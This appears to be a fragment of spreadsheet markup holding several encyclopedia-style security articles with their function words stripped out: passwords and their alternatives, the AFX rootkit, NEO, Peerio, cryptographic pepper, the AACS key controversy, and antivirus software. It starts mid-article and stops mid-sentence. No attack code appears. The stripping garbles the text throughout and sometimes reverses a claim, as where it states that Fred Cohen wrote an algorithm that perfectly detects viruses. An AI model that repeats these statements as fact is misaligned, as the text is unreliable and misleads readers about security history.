using means necessary. july 2011, booz allen hamilton, consulting firm work pentagon, servers hacked anonymous leaked day. "the leak, dubbed 'military meltdown monday,' includes 90,000 logins military personnel—including personnel uscentcom, socom, marine corps, various force facilities, homeland security, state department staff, looks like private sector contractors." these leaked passwords wound hashed sha1, later decrypted analyzed team imperva, revealing even military personnel look shortcuts ways around password requirements. alternatives passwords authentication numerous ways permanent semi-permanent passwords compromised prompted development techniques. unfortunately, inadequate practice, case become universally available users seeking secure alternative. 2012 paper examines passwords proved hard supplant (despite numerous predictions would soon thing past); examining thirty representative proposed replacements respect security, usability deployability conclude "none even retains full benefits legacy passwords already provide." single-use passwords. having passwords valid makes many potential attacks ineffective. most users find single-use passwords extremely inconvenient. they have, however, widely implemented personal online banking, known transaction authentication numbers (tans). home users perform small number transactions week, single-use issue intolerable customer dissatisfaction case. time-synchronized one-time passwords similar ways single-use passwords, value entered displayed small (generally pocketable) item changes every minute passwindow one-time passwords used single-use passwords, dynamic characters entered visible user superimposes unique printed visual server-generated challenge image shown user's screen. access controls based public-key cryptography e.g. ssh. necessary keys usually large memorize (but proposal passmaze) must stored local computer, security token portable memory device, flash drive even floppy disk. private stored cloud service provider, activated password two-factor authentication. biometric methods promise authentication based unalterable personal characteristics, currently (2008) high error rates require additional hardware scan, example, fingerprints, irises, etc. they proven easy spoof famous incidents testing commercially available systems, example, gummie fingerprint spoof demonstration, and, characteristics unalterable, cannot changed compromised; highly important consideration access control compromised access token necessarily insecure. single sign-on technology claimed eliminate need multiple passwords. such schemes relieve users administrators choosing reasonable single passwords, system designers administrators ensuring private access control information passed among systems enabling single sign-on secure attack. yet, satisfactory standard developed. envaulting technology password-free secure data removable storage devices flash drives. instead user passwords, access control based user's access network resource. non-text-based passwords, graphical passwords mouse-movement based passwords. graphical passwords alternative means authentication log-in intended used place conventional password; images, graphics colours instead letters, digits special characters. system requires users select series faces password, utilizing human brain's ability recall faces easily. implementations user required pick series images correct sequence order gain access. another graphical password solution creates one-time password using randomly generated grid images. each time user required authenticate, look images pre-chosen categories enter randomly generated alphanumeric character appears image form one-time password. far, graphical passwords promising, widely used. studies subject made determine usability real world. while believe graphical passwords would harder crack, others suggest people likely pick common images sequences pick common passwords. (2-dimensional key) matrix-like input method styles multiline passphrase, crossword, ascii/unicode art, optional textual semantic noises, create password/key beyond bits realize mepkc (memorizable public-key cryptography) using fully memorizable private upon current private management technologies like encrypted private key, split private key, roaming private key. cognitive passwords question answer cue/response pairs verify identity. "the password dead" "the password dead" recurring idea computer security. reasons given often include reference usability well security problems passwords. often accompanies arguments replacement passwords secure means authentication necessary imminent. this claim made numerous people least since 2004.alternatives passwords include biometrics, two-factor authentication single sign-on, microsoft's cardspace, higgins project, liberty alliance, nstic, fido alliance various identity proposals.however, spite predictions efforts replace passwords still dominant form authentication web. "the persistence passwords," cormac herley paul oorschot suggest every effort made "spectacularly incorrect assumption" passwords dead. they argue single technology matches combination cost, immediacy convenience" "passwords best many scenarios currently used." following this, bonneau systematically compared passwords competing authentication schemes terms usability, deployability, security. their analysis shows schemes better passwords security, schemes better worse respect usability, every scheme worse passwords deployability. authors conclude following observation: "marginal gains often sufficient reach activation energy necessary overcome significant transition costs, provide best explanation likely live considerably longer seeing funeral procession passwords arrive cemetery." also references external links graphical passwords: survey large list commonly used passwords large collection statistics passwords research papers password-based cryptography international passwords conference procedural advice organisations administrators (pdf) centre security, communications network research, university plymouth (pdf) 2017 draft update nist password standards u.s. federal government</t>
  </si>
  <si>
    <t>AFX Windows Rootkit 2003</t>
  </si>
  <si>
    <t>windows rootkit 2003 user mode rootkit hides files, processes registry. installation when installer rootkit executed, installer creates files iexplore.dll explorer.dll system directory. iexplore.dll injected explorer.exe, explorer.dll injected running processes. payload injected dlls hooks windows functions hide files, processes registry. references encyclopedia entry: trojan:win32/delf.m learn malware microsoft malware protection center</t>
  </si>
  <si>
    <t>NEO (cryptocurrency)</t>
  </si>
  <si>
    <t>(formerly antshares) open-source decentralized blockchain decentralized application platform founded 2014 hongfei erik zhang. since rebranding antshares 2017, project's vision realize "smart economy" utilizing blockchain technology smart contracts issue manage digitized assets.the network runs proof stake decentralized byzantine fault tolerant (dbft) consensus mechanism number centrally approved nodes, support 10,000 transactions second. base asset blockchain non-divisible token generates tokens. these tokens, separate asset network, used transaction fees, divisible smallest unit 0.00000001. inflation rate controlled decaying half life algorithm release million approximately years.a total million created genesis block. million sold early investors initial coin offering 2016 raised 4.65 million, remaining million locked smart contract. each year, maximum million tokens unlocked used development team fund long-term development goals.the core feature revolves around tools allow developers efficiently deploy scale smart contract applications blockchain. x.509 digital identities allow developers tokens real world identities aids complying kyc/aml regulatory requirements. update neo3 first announced erik zhang 2018 upgrade previous protocol (now known legacy). improves previous versions powerful features modular design. extent improvements implemented certain features backward compatibility legacy blockchain. implemented launched genesis block. history 2014, antshares founded hongfei erik zhang. following year, open-sourced github september 2015, white paper released. officially rebranded antshares june 2017, idea combining past future. word “neo”, originates greek word “νέο“, meaning ‘new’, ‘modern’, ‘young’. vision building “smart economy” developed along rebranding.in march 2018, neo's parent company onchain distributed ontology token (ont) every held user's cryptocurrency wallet. these tokens used vote system upgrades, identity verification mechanisms, governance issues platform. references external links official website</t>
  </si>
  <si>
    <t>Peerio</t>
  </si>
  <si>
    <t>peerio cross-platform end-to-end encrypted application provided secure messaging, file sharing, cloud file storage. peerio available application ios, android, macos, windows, linux. peerio (legacy) originally released january 2015, replaced peerio june 2017. discontinued.messages user files stored peerio cloud protected end-to-end encryption, meaning data encrypted could read third parties, peerio service providers. security provided single permanent key-password, peerio called "account key".the company, peerio technologies inc., founded 2014 vincent drouin. intent behind peerio provide security program easier standard.peerio acquired workjam, digital workplace solutions provide, january 2019. features peerio allowed users share encrypted messages files direct messages groups peerio called "rooms".peerio "rooms" offered team-oriented group chat, allowing administrative functionality remove users group chat.peerio allowed users store encrypted files online, offering limited cloud storage free optional paid upgrades.peerio messages files persist logins hardware, differing ephemeral encrypted messaging apps retain message file history logins different devices. peerio supported application based multi-factor authentication.peerio allowed users share animated gifs. security end-to-end encryption peerio utilized end-to-end encryption applied default message file data. end-to-end encryption intended encrypt data sender intended recipients able decrypt, thus read, data. taken peerio's privacy policy: "peerio utilizes nacl (pronounced "salt") cryptographic framework, uses following cryptographic primitives: x25519 public agreement elliptic curves. ed25519 public signatures. xsalsa20 encryption confidentiality. poly1305 ensuring integrity encrypted data.additionally, peerio uses scrypt memory-hard derivation blake2s used various hashing operations. in-transit encryption, peerio services used transport layer security (tls) best-practice cipher suite configuration, including support perfect forward secrecy (pfs). view detailed up-to-date independent review peerio's configuration labs." code audits prior peerio's initial release, software audited german security firm cure53, found non-security related bugs, fixed prior applications release.according peerio's website, application also audited march 2017 cure53. open source peerio partly open source published code publicly github bounty peerio offered bounty, offering cash rewards anyone reports security vulnerabilities. peerio (legacy) first iteration peerio, peerio (legacy), developed nadim kobeissi florencia herra-vega released january 2015 closed january 2018.peerio (legacy) free application, available android, ios, windows, macos, linux, google chrome extension. offered end-to-end encryption, enabled default. encryption used minilock open-source security standard, also developed kobeissi.on june 2017, peerio launched successor peerio (legacy). according company's blog, peerio purported "radical overhaul" original application's core technology. claimed benefits comparison peerio (legacy) include increased speed, support larger file transfers 7000gb), re-designed user interface. peerio also stated added focus towards businesses looking encrypted team collaboration software. references</t>
  </si>
  <si>
    <t>Pepper (cryptography)</t>
  </si>
  <si>
    <t>cryptography, pepper secret added input password hashing cryptographic hash function. this value differs salt stored alongside password hash, rather pepper kept separate medium, hardware security module. note national institute standards technology never refers value pepper rather secret salt. pepper similar concept salt encryption key. like salt randomized value added password hash, similar encryption kept secret. pepper performs comparable role salt encryption key, salt secret (merely unique) stored alongside hashed output, pepper secret must stored output. hash salt usually stored database, pepper must stored separately prevent obtained attacker case database breach. where salt long enough unique user, pepper long enough remain secret brute force attempts discover (nist recommends least bits). history idea site- service-specific salt addition per-user salt) long history, steven bellovin proposing local parameter bugtraq post 1995. 1996 manber also described advantages scheme, terming secret salt. term pepper used, analogy salt, variety meanings. example, discussing challenge-response scheme, pepper used salt-like quantity, though used password storage; used data transmission technique pepper must guessed; even part jokes.the term pepper proposed secret local parameter stored separately password discussion protecting passwords rainbow table attacks. this usage immediately catch example, fred wenzel added support django password hashing storage based combination bcrypt hmac separately stored nonces, without using term. usage since become common. types there multiple different types pepper: secret unique user. shared secret common users. randomly-selected number must re-discovered every password input. shared secret pepper case shared-secret pepper, single compromised password (via password reuse attack) along user's salt lead attack discover pepper, rendering ineffective. attacker knows plaintext password user's salt, well algorithm used hash password, discovering pepper matter brute forcing values pepper. this nist recommends secret value least bits, discovering exhaustive search intractable. pepper must generated anew every application deployed otherwise breach application would result lowered security another application. without knowledge pepper, passwords database difficult extract hashed values, attacker would need guess password well pepper. pepper adds security database salts hashes unless attacker able obtain pepper, cracking even single hash intractable, matter weak original password. even list (salt, hash) pairs, attacker must also guess secret pepper order find password produces hash. nist specification secret salt suggests using password-based derivation function (pbkdf) approved pseudorandom function hmac sha-3 hash function hmac. nist recommendation also perform least 1000 iterations pbkdf, minimum 1000 iterations using secret salt place non-secret salt. unique pepper user case pepper unique user, tradeoff gaining extra security cost storing information securely. compromising password hash revealing secret pepper effect password hashes secret pepper, pepper must individually discovered, greatly increases time taken attack password hashes. randomly selected pepper case randomly-selected pepper saved all, must rediscovered every time needed. this means algorithm verify password would effectively need brute-force pepper every time. reason, algorithms implementing would want large value pepper, verification reasonably fast. also salt (cryptography) hmac passwd references</t>
  </si>
  <si>
    <t>AACS LA</t>
  </si>
  <si>
    <t>aacs (advanced access content system licensing administrator) body develops licenses aacs copy-protection system used blu-ray disc high-definition optical disc formats. also aacs encryption controversy external links official website</t>
  </si>
  <si>
    <t>AACS encryption key controversy</t>
  </si>
  <si>
    <t>controversy surrounding aacs cryptographic arose april 2007 motion picture association america advanced access content system licensing administrator, (aacs began issuing cease desist letters websites publishing 128-bit (16-byte) number, represented hexadecimal (commonly referred f9), cryptographic dvds blu-ray discs. letters demanded immediate removal links citing anti-circumvention provisions united states digital millennium copyright (dmca). response widespread internet postings key, aacs issued various press statements, praising websites complied requests acting "responsible manner" warning "legal technical tools" adapting situation. controversy escalated early 2007, aggregate news site digg received dmca cease desist notice removed numerous articles matter banned users reposting information. this sparked describe digital revolt "cyber-riot", users posted spread digg, throughout internet masse, thereby leading streisand effect. aacs described situation "interesting twist". background hexadecimal base-16 numeral system used fields computer programming mathematics. ordinary number widely known hexadecimal representation; decimal notation, interpreted integer, 13,­256,­278,­887,­989,­457,­651,­018,­865,­901,­401,­704,­640.because encryption used part circumvention technology forbidden dmca, possession distribution viewed illegal aacs, well legal professionals. since 128-bit numerical value, dubbed illegal number. opponents expansion scope copyright criticize idea making particular number illegal.commercial dvds blu-ray discs integrate copy protection technology specified aacs there several interlocking encryption mechanisms, cracking part system necessarily crack parts. therefore, many parts needed play disc unlicensed player. aacs used revoke specific playback device, known compromised, windvd. compromised players still used view discs, newer releases without encryption keys compromised players. players cracked, revocation would lead legitimate users compromised players forced upgrade replace player software firmware order view discs. each playback device comes binary tree secret device processing keys. processing tree, requirement play aacs encrypted discs, selected based device information disc played. such, processing revoked, newly produced discs cause playback devices select different valid processing decrypt discs. timeline aacs cracking 2006 december 2006, person using alias muslix64 published utility named backuphddvd source code decryption forum website doom9. backuphddvd used decrypt aacs protected content knows encryption key. muslix64 claimed found title volume keys main memory playing dvds using software player, finding difficult. 2007 january 2007, muslix64 published version program, volume support. january 2007, forum members detailed find title volume keys, stating also found keys several movies running windvd. january title posted pastebin.com form riddle, solved entering terms google search engine. converting results hexadecimal, correct could formed. later day, first cracked dvd, serenity, uploaded private torrent tracker. aacs confirmed january title keys certain dvds published without authorization.doom9.org forum user arnezami found published aacs processing february nothing hacked, cracked even reverse-engineered btw: watch "show" memory. debugger used, binaries changed. this specific playback device title. doom9.org forum user jx6bpm claimed march revealed cyberlink's powerdvd's key, anydvd.the aacs announced april revoked decryption keys associated certain software high-definition players, able decrypt aacs encrypted disks mastered april without update software.on week discs updated processing reached retail, claims reported keys retrieved preview disc matrix trilogy. posted edward felten's freedom tinker blog confirmed week later arnezami doom9 processing (mkb v3). dmca notices digg early april 2007, aacs issued dmca violation notices, sent charles sims proskauer rose. following this, dozens notices sent various websites hosted united states.on 2007, response dmca demand letter, technology news site digg began closing accounts removing posts containing alluding key. digg community reacted creating flood posts containing key, many using creative ways disguising key, semi-directly indirectly inserting number, song images (either representing digits pictorially directly representing bytes colors) merchandise. point, digg's "entire homepage covered links hd-dvd code anti-digg references." eventually digg administrators reversed position, founder kevin rose stating: now, seeing hundreds stories reading thousands comments, made clear. you'd rather digg fighting bigger company. hear you, effective immediately delete stories comments containing code deal whatever consequences might legal opinions lawyers representatives entertainment industry, including michael ayers, attorney toshiba corporation, expressed surprise digg's decision, suggested suit aimed digg might merely spread information widely. stick legal right somewhat worse that's interesting concept. american association's ereport published discussion controversy, eric goldman santa clara university's high tech institute noted illegality putting code questionable (that section communications decency protect provider material copyrighted), although continuing allow posting "risky", entertainment lawyer carole handler noted even material illegal, laws dmca prove ineffective practical sense. impact response events occurring digg call "spread number", rapidly posted thousands pages, blogs wikis across internet. reaction example streisand effect.intellectual property lawyer douglas sorocco noted, "people getting creative. shows futility trying stop this. once information there, cease-and-desist letters going infuriate community more." outside internet mass media, appeared t-shirts, poetry, songs music videos, illustrations graphic artworks, tattoos body art, comic strips.on tuesday afternoon, 2007, google search returned 9,410 results, search next morning returned nearly 300,000 results. friday, reported search google shows almost 700,000 pages published key, despite fact april aacs sent dmca notice google, demanding google stop returning results searches key.widespread news coverage included speculation development user-driven websites, legal liability running user-driven website, perception acceptance drm, failure business model "secrecy based businesses every aspect" internet era, harm industry cause harshly-perceived legal action.in opposing move, carter wood national association manufacturers said removed "digg it"-link weblog. until digg community shows much fervor attacking intellectual piracy attacking companies legitimately defending property, well, want promoting site using "digg feature. media coverage initially avoided quoting itself. however, several us-based news sources stories containing key, quoting digg, though none known received dmca notices result. later reports discussed this, quoting key. current broadcast google current story digg incident 2007, displaying full screen several seconds placing story station website.wikipedia, 2007, locked page named number prevent former secret posted again. page locked, too, keep number." this action later reversed. arrested charged finding publishing original key. aacs reaction 2007, aacs announced website "requested removal solely illegal circumvention tools, including encryption keys, number sites", "not requested removal deletion discussion commentary". statement continued, "aacs encouraged cooperation received thus numerous sites chosen address legal obligations responsible manner." news earlier quoted aacs executive saying bloggers "crossed line", aacs looking "legal technical tools" confront published key, events involving digg "interesting twist". also copy control association decss fckgw (microsoft windows) playstation private compromised hdcp master release texas instruments signing controversy security obscurity streisand effect references external links doom9's forum, original focus controversy legal primer electronic frontier foundation (eff) original images posted some images accompanied digg articles front page user revolt.</t>
  </si>
  <si>
    <t>Antivirus software</t>
  </si>
  <si>
    <t>antivirus software (abbreviated software), also known anti-malware, computer program used prevent, detect, remove malware. antivirus software originally developed detect remove computer viruses, hence name. however, proliferation malware, antivirus software started protect computer threats. particular, modern antivirus software protect users malicious browser helper objects (bhos), browser hijackers, ransomware, keyloggers, backdoors, rootkits, trojan horses, worms, malicious lsps, dialers, fraud tools, adware, spyware. some products also include protection computer threats, infected malicious urls, spam, scam phishing attacks, online identity (privacy), online banking attacks, social engineering techniques, advanced persistent threat (apt), botnet ddos attacks. antivirus collection small program facilitates guard computer system unauthorized access software harm system. history 1949–1980 period (pre-antivirus days) although roots computer virus date back early 1949, hungarian scientist john neumann published "theory self-reproducing automata", first known computer virus appeared 1971 dubbed "creeper virus". this computer virus infected digital equipment corporation's (dec) pdp-10 mainframe computers running tenex operating system.the creeper virus eventually deleted program created tomlinson known "the reaper". some people consider "the reaper" first antivirus software ever written case, important note reaper actually virus specifically designed remove creeper virus.the creeper virus followed several viruses. first known appeared wild" "elk cloner", 1981, infected apple computers.in 1983, term "computer virus" coined fred cohen first ever published academic papers computer viruses. cohen used term "computer virus" describe programs that: "affect computer programs modifying include (possibly evolved) copy itself." (note recent definition computer virus given hungarian security researcher péter szőr: code recursively replicates possibly evolved copy itself").the first compatible wild" computer virus, first real widespread infections, "brain" 1986. from then, number viruses grown exponentially. most computer viruses written early mid-1980s limited self-reproduction specific damage routine built code. that changed programmers became acquainted computer virus programming created viruses manipulated even destroyed data infected computers.before internet connectivity widespread, computer viruses typically spread infected floppy disks. antivirus software came use, updated relatively infrequently. during time, virus checkers essentially check executable files boot sectors floppy disks hard disks. however, internet usage became common, viruses began spread online. 1980–1990 period (early days) there competing claims innovator first antivirus product. possibly, first publicly documented removal wild" computer virus (i.e. "vienna virus") performed bernd 1987.in 1987, andreas lüning figge, founded data software 1985, released first antivirus product atari platform. 1987, ultimate virus killer (uvk) also released. this facto industry standard virus killer atari atari falcon, last version (version 9.0) released april 2004. 1987, united states, john mcafee founded mcafee company (was part intel security) and, year, released first version virusscan. also 1987 czechoslovakia), peter paško, rudolf hrubý, miroslav trnka created first version antivirus.in 1987, fred cohen wrote algorithm perfectly detect possible computer viruses.finally, 1987, first heuristic antivirus utilities released: flushot plus ross greenberg anti4us erwin lanting. o'reilly book, malicious mobile code: virus protection windows, roger grimes described flushot plus "the first holistic program fight malicious mobile code (mmc)."however, kind heuristic used early engines totally different used today. first product heuristic engine resembling modern ones f-prot 1991. early heuristic engines based dividing binary different sections: data section, code section legitimate binary, usually starts always location). indeed, initial viruses re-organized layout sections, overrode initial portion section order jump file malicious code located—only going back resume execution original code. this specific pattern, used time legitimate software, represented elegant heuristic catch suspicious code. other kinds advanced heuristics later added, suspicious section names, incorrect header size, regular expressions, partial pattern in-memory matching. 1988, growth antivirus companies continued. germany, tjark auerbach founded avira (h+bedv time) released first version antivir (named "luke filewalker" time). bulgaria, vesselin bontchev released first freeware antivirus program later joined frisk software). also frans veldman released first version thunderbyte antivirus, also known tbav sold company norman safeground 1998). czechoslovakia, pavel baudiš eduard kučera started avast! time alwil software) released first version avast! antivirus. june 1988, south korea, cheol-soo released first antivirus software, called founded ahnlab later 1995). finally, autumn 1988, united kingdom, alan solomon founded international created solomon's anti-virus toolkit (although launched commercially 1991 1998 solomon's company acquired mcafee). november 1988 professor panamerican university mexico city named alejandro carriles copyrighted first antivirus software mexico name "byte matabichos" (byte bugkiller) help solve rampant virus infestation among students.also 1988, mailing list named virus-l started bitnet/earn network viruses possibilities detecting eliminating viruses discussed. some members mailing list were: alan solomon, eugene kaspersky (kaspersky lab), friðrik skúlason (frisk software), john mcafee (mcafee), luis corrons (panda security), mikko hyppönen (f-secure), péter szőr, tjark auerbach (avira) vesselin bontchev (frisk software).in 1989, iceland, friðrik skúlason created first version f-prot anti-virus founded frisk software 1993). meanwhile united states, symantec (founded gary hendrix 1982) launched first symantec antivirus macintosh (sam). 2.0, released march 1990, incorporated technology allowing users easily update intercept eliminate viruses, including many exist time program's release.in 1980s, united kingdom, hruska peter lammer founded security firm sophos began producing first antivirus encryption products. period, hungary, also virusbuster founded (which recently incorporated sophos). 1990–2000 period (emergence antivirus industry) 1990, spain, mikel urizarbarrena founded panda security (panda software time). hungary, security researcher péter szőr released first version pasteur antivirus. italy, gianfranco tonello created first version virit explorer antivirus, founded soft year later.in 1990, computer antivirus research organization (caro) founded. 1991, caro released "virus naming scheme", originally written friðrik skúlason vesselin bontchev. although naming scheme outdated, remains existing standard computer security companies researchers ever attempted adopt. caro members includes: alan solomon, costin raiu, dmitry gryaznov, eugene kaspersky, friðrik skúlason, igor muttik, mikko hyppönen, morton swimmer, nick fitzgerald, padgett peterson, peter ferrie, righard zwienenberg vesselin bontchev.in 1991, united states, symantec released first version norton antivirus. year, czech republic, gritzbach tomáš hofer founded technologies (grisoft time), although released first version anti-virus guard (avg) 1992. hand, finland, f-secure (founded 1988 petri allas risto siilasmaa name data fellows) released first version antivirus product. f-secure claims first antivirus firm establish presence world wide web.in 1991, european institute computer antivirus research (eicar) founded antivirus research improve development antivirus software.in 1992, russia, igor danilov released first version spiderweb, later became web.in 1994, av-test reported 28,613 unique malware samples (based md5) database.over time companies founded. 1996, romania, bitdefender founded released first version anti-virus expert (avx). 1997, russia, eugene kaspersky natalya kaspersky co-founded security firm kaspersky lab.in 1996, also first wild" linux virus, known "staog".in 1999, av-test reported 98,428 unique malware samples (based md5) database. 2000–2005 period 2000, rainer link howard fuhs started first open source antivirus engine, called openantivirus project.in 2001, tomasz kojm released first version clamav, first ever open source antivirus engine commercialised. 2007, clamav bought sourcefire, turn acquired cisco systems 2013.in 2002, united kingdom, morten lund theis søndergaard co-founded antivirus firm bullguard.in 2005, av-test reported 333,425 unique malware samples (based md5) database. 2005–2014 period 2007, av-test reported number 5,490,960 unique malware samples (based md5) year. 2012 2013, antivirus firms reported malware samples range 300,000 500,000 day.over years become necessary antivirus software several different strategies (e.g. specific email network protection level modules) detection algorithms, well check increasing variety files, rather executables, several reasons: powerful macros used word processor applications, microsoft word, presented risk. virus writers could macros write viruses embedded within documents. this meant computers could also risk infection opening documents hidden attached macros. possibility embedding executable objects inside otherwise non-executable file formats make opening files risk. later email programs, particular microsoft's outlook express outlook, vulnerable viruses embedded email body itself. user's computer could infected opening previewing message.in 2005, f-secure first security firm developed anti-rootkit technology, called blacklight. because users usually connected internet continual basis, oberheide first proposed cloud-based antivirus design 2008.in february 2008 mcafee labs added industry-first cloud-based anti-malware functionality virusscan name artemis. tested av-comparatives february 2008 officially unveiled august 2008 mcafee virusscan.cloud created problems comparative testing security software part definitions testers control constantly updated company servers) thus making results non-repeatable. result, anti-malware testing standards organisation (amtso) started working method testing cloud products adopted 2009.in 2011, introduced similar cloud service, called protective cloud technology. 2014–present (rise next-gen) following 2013 release report mandiant, industry seen shift towards signature-less approaches problem capable detecting mitigating zero-day attacks. numerous approaches address forms threats appeared, including behavioral detection, artificial intelligence, machine learning, cloud-based file detonation. according gartner, expected rise entrants, carbon black, cylance crowdstrike force incumbents phase innovation acquisition. method bromium involves micro-virtualization protect desktops malicious code execution initiated user. another approach sentinelone carbon black focuses behavioral detection building full context around every process execution path real time, cylance leverages artificial intelligence model based machine learning. increasingly, signature-less approaches defined media analyst firms "next-generation" antivirus seeing rapid market adoption certified antivirus replacement technologies firms coalfire directdefense. response, traditional antivirus vendors trend micro, symantec sophos responded incorporating "next-gen" offerings portfolios analyst firms forrester gartner called traditional signature-based antivirus "ineffective" "outdated". identification methods solid theoretical results study computer viruses frederick cohen's 1987 demonstration algorithm perfectly detect possible viruses. however, using different layers defense, good detection rate achieved. there several methods antivirus engines identify malware: sandbox detection: particular behavioural-based detection technique that, instead detecting behavioural fingerprint time, executes programs virtual environment, logging actions program performs. depending actions logged, antivirus engine determine program malicious not. not, then, program executed real environment. albeit technique shown quite effective, given heaviness slowness, rarely used end-user antivirus solutions. data mining techniques: latest approaches applied malware detection. data mining machine learning algorithms used classify behaviour file either malicious benign) given series file features, extracted file itself. signature-based detection traditional antivirus software relies heavily upon signatures identify malware.substantially, malware sample arrives hands antivirus firm, analysed malware researchers dynamic analysis systems. then, determined malware, proper signature file extracted added signatures database antivirus software.although signature-based approach effectively contain malware outbreaks, malware authors tried stay step ahead software writing "oligomorphic", "polymorphic" and, recently, "metamorphic" viruses, encrypt parts otherwise modify method disguise, match virus signatures dictionary. heuristics many viruses start single infection either mutation refinements attackers, grow dozens slightly different strains, called variants. generic detection refers detection removal multiple threats using single virus definition.for example, vundo trojan several family members, depending antivirus vendor's classification. symantec classifies members vundo family distinct categories, trojan.vundo trojan.vundo.b.while advantageous identify specific virus, quicker detect virus family generic signature inexact match existing signature. virus researchers find common areas viruses family share uniquely thus create single generic signature. these signatures often contain non-contiguous code, using wildcard characters differences lie. these wildcards allow scanner detect viruses even padded extra, meaningless code. detection uses method said "heuristic detection." rootkit detection anti-virus software attempt scan rootkits. rootkit type malware designed gain administrative-level control computer system without detected. rootkits change operating system functions cases tamper anti-virus program render ineffective. rootkits also difficult remove, cases requiring complete re-installation operating system. real-time protection real-time protection, on-access scanning, background guard, resident shield, autoprotect, synonyms refer automatic protection provided antivirus, anti-spyware, anti-malware programs. this monitors computer systems suspicious activity computer viruses, spyware, adware, malicious objects. real-time protection detects threats opened files scans apps real-time installed device. when inserting opening email, browsing web, file already computer opened executed. issues concern unexpected renewal costs some commercial antivirus software end-user license agreements include clause subscription automatically renewed, purchaser's credit card automatically billed, renewal time without explicit approval. example, mcafee requires users unsubscribe least days expiration present subscription bitdefender sends notifications unsubscribe days renewal. norton antivirus also renews subscriptions automatically default. rogue security applications some apparent antivirus programs actually malware masquerading legitimate software, winfixer, antivirus, defender. problems caused false positives "false positive" "false alarm" antivirus software identifies non-malicious file malware. when happens, cause serious problems. example, antivirus program configured immediately delete quarantine infected files, common microsoft windows antivirus applications, false positive essential file render windows operating system applications unusable. recovering damage critical software infrastructure incurs technical support costs businesses forced close whilst remedial action undertaken.examples serious false-positives: 2007: faulty virus signature issued symantec mistakenly removed essential operating system files, leaving thousands unable boot. 2007: executable file required pegasus mail windows falsely detected norton antivirus trojan automatically removed, preventing pegasus mail running. norton antivirus falsely identified three releases pegasus mail malware, would delete pegasus mail installer file happened. response pegasus mail stated:on basis norton/symantec done every last three releases pegasus mail, condemn product flawed use, recommend strongest terms users cease using favour alternative, less buggy anti-virus packages.april 2010: mcafee virusscan detected svchost.exe, normal windows binary, virus machines running windows service pack causing reboot loop loss network access. december 2010: faulty update anti-virus suite damaged 64-bit versions windows rendering unable boot, endless boot loop created. october 2011: microsoft security essentials (mse) removed google chrome browser, rival microsoft's internet explorer. flagged chrome zbot banking trojan. september 2012: sophos' anti-virus suite identified various update-mechanisms, including own, malware. configured automatically delete detected files, sophos antivirus could render unable update, required manual intervention problem. september 2017: google play protect anti-virus started identifying motorola's moto bluetooth application malware, causing bluetooth functionality become disabled. system interoperability related issues running (the real-time protection multiple antivirus programs concurrently degrade performance create conflicts. however, using concept called multiscanning, several companies (including data software microsoft) created applications multiple engines concurrently. sometimes necessary temporarily disable virus protection installing major updates windows service packs updating graphics card drivers. active antivirus protection partially completely prevent installation major update. anti-virus software cause problems installation operating system upgrade, e.g. upgrading newer version windows place"—without erasing previous version windows. microsoft recommends anti-virus software disabled avoid conflicts upgrade installation process. active anti-virus software also interfere firmware update process.the functionality computer programs hampered active anti-virus software. example, truecrypt, disk encryption program, states troubleshooting page anti-virus programs conflict truecrypt cause malfunction operate slowly. anti-virus software impair performance stability games running steam platform.support issues also exist around antivirus application interoperability common solutions like remote access network access control products. these technology solutions often policy assessment applications require up-to-date antivirus installed running. antivirus application recognized policy assessment, whether antivirus application updated part policy assessment library, user unable connect. effectiveness studies december 2007 showed effectiveness antivirus software decreased previous year, particularly unknown zero attacks. computer magazine found detection rates threats dropped 40-50% 2006 20–30% 2007. time, exception nod32 antivirus, managed detection rate 68%. according zeus tracker website average detection rate variants well-known zeus trojan 40%.the problem magnified changing intent virus authors. some years obvious virus infection present. time, viruses written amateurs exhibited destructive behavior pop-ups. modern viruses often written professionals, financed criminal organizations.in 2008, chen, trend micro, stated anti-virus industry over-hyped effective products are—and misleading customers—for years.independent testing major virus scanners consistently shows none provides 100% virus detection. best ones provided high 99.9% detection simulated real-world situations, lowest provided 91.1% tests conducted august 2013. many virus scanners produce false positive results well, identifying benign files malware.although methods differ, notable independent quality testing agencies include av-comparatives, icsa labs, west coast labs, virus bulletin, av-test members anti-malware testing standards organization. viruses anti-virus programs always effective viruses, even non-signature-based methods detect viruses. reason virus designers test viruses major anti-virus applications make sure detected releasing wild.some viruses, particularly ransomware, polymorphic code avoid detection virus scanners. jerome segura, security analyst paretologic, explained: it's something miss time type [ransomware virus] comes sites polymorphism, means basically randomize file send gets well-known antivirus products easily. i've seen people firsthand getting infected, pop-ups antivirus software running detecting anything. actually pretty hard well, never really sure really gone. when something like usually advise reinstall operating system reinstall backups. proof concept virus used graphics processing unit (gpu) avoid detection anti-virus software. potential success involves bypassing order make much harder security researchers analyse inner workings malware. rootkits detecting rootkits major challenge anti-virus programs. rootkits full administrative access computer invisible users hidden list running processes task manager. rootkits modify inner workings operating system tamper antivirus programs. damaged files file infected computer virus, anti-virus software attempt remove virus code file disinfection, always able restore file undamaged state. circumstances, damaged files restored existing backups shadow copies (this also true ransomware); installed software damaged requires re-installation (however, system file checker). firmware infections writeable firmware computer infected malicious code. this major concern, infected bios could require actual bios chip replaced ensure malicious code completely removed. anti-virus software effective protecting firmware motherboard bios infection. 2014, security researchers discovered devices contain writeable firmware modified malicious code (dubbed "badusb"), anti-virus software cannot detect prevent. malicious code undetected computer could even infect operating system prior booting performance drawbacks antivirus software drawbacks, first impact computer's performance.furthermore, inexperienced users lulled false sense security using computer, considering computers invulnerable, problems understanding prompts decisions antivirus software presents with. incorrect decision lead security breach. antivirus software employs heuristic detection, must fine-tuned minimize misidentifying harmless software malicious (false positive).antivirus software usually runs highly trusted kernel level operating system allow access potential malicious process files, creating potential avenue attack. national security agency (nsa) government communications headquarters (gchq) intelligence agencies, respectively, exploiting anti-virus software users. anti-virus software highly privileged trusted access underlying operating system, makes much appealing target remote attacks. additionally anti-virus software "years behind security-conscious client-side applications like browsers document readers. means acrobat reader, microsoft word google chrome harder exploit percent anti-virus products there", according joxean koret, researcher coseinc, singapore-based information security consultancy. alternative solutions antivirus software running individual computers common method employed guarding malware, solution. other solutions also employed users, including unified threat management (utm), hardware network firewalls, cloud-based antivirus online scanners. hardware network firewall network firewalls prevent unknown programs processes accessing system. however, antivirus systems make attempt identify remove anything. they protect infection outside protected computer network, limit activity malicious software present blocking incoming outgoing requests certain tcp/ip ports. firewall designed deal broader system threats come network connections system alternative virus protection system. cloud antivirus cloud antivirus technology uses lightweight agent software protected computer, offloading majority data analysis provider's infrastructure.one approach implementing cloud antivirus involves scanning suspicious files using multiple antivirus engines. this approach proposed early implementation cloud antivirus concept called cloudav. cloudav designed send programs documents 